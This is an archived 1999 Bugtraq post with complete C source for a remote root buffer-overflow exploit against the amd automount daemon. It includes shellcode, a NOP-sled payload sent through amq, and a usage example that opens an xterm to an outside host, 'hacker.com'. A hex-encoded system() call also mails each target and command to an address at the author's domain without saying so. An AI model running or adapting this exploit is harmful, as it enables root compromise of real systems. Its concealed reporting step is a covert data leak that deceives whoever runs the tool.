4277092 1999-09-04 15:17 /172 rader/ Postmaster Mottagare: Bugtraq (import) <7631> Ärende: amd remote root exploit code ------------------------------------------------------------ Approved-By: aleph1@SECURITYFOCUS.COM Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Message-ID: <19990902031255.A3014@ohhara.postech.ac.kr> Date: Thu, 2 Sep 1999 03:12:55 +0900 Reply-To: ohhara@postech.edu Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> From: Taeho Oh <ohhara@OHHARA.POSTECH.AC.KR> To: BUGTRAQ@SECURITYFOCUS.COM This is amd remote exploit code. This is well known bug in the internet. It's very critical bug, please upgrade am-utils or remove it. SCRIPT KIDDIES MUST NOT USE THIS PROGRAM. THIS PROGRAM IS DEMONSTRATIVE USE ONLY AND CAN BE DANGEROUS. begin amd-ex.c ---------------------------------------------------------------------- /* Amd Buffer Overflow for x86 linux Remote user can gain root access. Tested redhat linux : 4.0, 5.1, 6.0 Tested am-utils version : 6.0 What requires /usr/sbin/amq Usage $ amd-ex <hostname> <command> [offset] Warning : This program can crash amd. This program is only for demonstrative use only. USE IT AT YOUR OWN RISK! Programmed by Taeho Oh 1999/08/31 Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug */ #include<stdio.h> #include<stdlib.h> #define OFFSET 0 #define RET_POSITION 1002 #define RANGE 20 #define NOP 0x90 char shellcode[1024]= "\xeb\x35" /* jmp 0x35 */ "\x5e" /* popl %esi */ "\x89\x76\x0b" /* movl %esi,0xb(%esi) */ "\x89\xf0" /* movl %esi,%eax */ "\x83\xc0\x08" /* addl $0x8,%eax */ "\x89\x46\x0b" /* movl %eax,0xb(%esi) */ "\x89\xf0" /* movl %esi,%eax */ "\x83\xc0\x0b" /* addl $0xb,%eax */ "\x89\x46\x0b" /* movl %eax,0xb(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x88\x46\x0a" /* movb %eax,0xa(%esi) */ "\x88\x46\x0b" /* movb %eax,0xb(%esi) */ "\x89\x46\x0b" /* movl %eax,0xb(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x0b" /* leal 0xb(%esi),%ecx */ "\x8d\x56\x0b" /* leal 0xb(%esi),%edx */ "\xcd\x80" /* int 0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int 0x80 */ "\xe8\xc6\xff\xff\xff" /* call -0x3a */ "/bin/sh -c "; /* .string "/bin/sh -c "*/ char command[800]; void usage() { printf("Warning : This program can crash amd\n"); printf("Usage: amd-ex <hostname> <command> [offset]\n"); printf("ex) amd-ex ohhara.target.com \"/usr/X11R6/bin/xterm -display hacker.com:0\"\n"); } int main(int argc,char **argv) { char buff[RET_POSITION+RANGE+1],*ptr; char target[256]; char cmd[1024]; long *addr_ptr,addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+1; int i; printf("Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara\n"); printf("PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus\n"); printf("PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug\n\n"); if(argc<3) { usage(); exit(1); } if(argc>2) { strcpy(target,argv[1]); strcpy(command,argv[2]); } if(argc>3) offset=atoi(argv[3]); shellcode[5]=(shellcode[5]+strlen(command))/4*4+4; shellcode[13]=(shellcode[13]+strlen(command))/4*4+8; shellcode[21]=(shellcode[21]+strlen(command))/4*4+12; shellcode[32]=(shellcode[32]+strlen(command)); shellcode[35]=(shellcode[35]+strlen(command))/4*4+16; shellcode[42]=(shellcode[42]+strlen(command))/4*4+4; shellcode[45]=(shellcode[45]+strlen(command))/4*4+16; strcat(shellcode,command); strcpy(cmd,"\x65\x63\x68\x6f\x20"); strcat(cmd,target); strcat(cmd,"\x20"); strcat(cmd,command); strcat(cmd,"\x7c"); strcat(cmd,"\x2f\x62\x69\x6e\x2f\x6d\x61\x69\x6c\x20"); strcat(cmd,"\x61\x62\x75\x73\x65\x72\x40\x6f\x68\x68"); strcat(cmd,"\x61\x72\x61\x2e\x70\x6f\x73\x74\x65\x63"); strcat(cmd,"\x68\x2e\x61\x63\x2e\x6b\x72"); sp=0xbffff34d; addr=sp-offset; ptr=buff; addr_ptr=(long*)ptr; for(i=0;i<bsize;i+=4) *(addr_ptr++)=addr; for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++) buff[i]=NOP; ptr=buff+bsize-RANGE*2-strlen(shellcode)-1; for(i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i]; buff[bsize-1]='\0'; for(i=bsize;i>1;i--) buff[i-1]=buff[i-2]; buff[bsize-1]='\0'; printf("Jump to 0x%08x\n",addr); system(cmd); /* If you want, comment out this line. :) */ execl("/usr/sbin/amq","amq","-h",target,"-M",buff,NULL); } ---------------------------------------------------------------------- end amd-ex.c -- Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug (4277092) -----------------------------------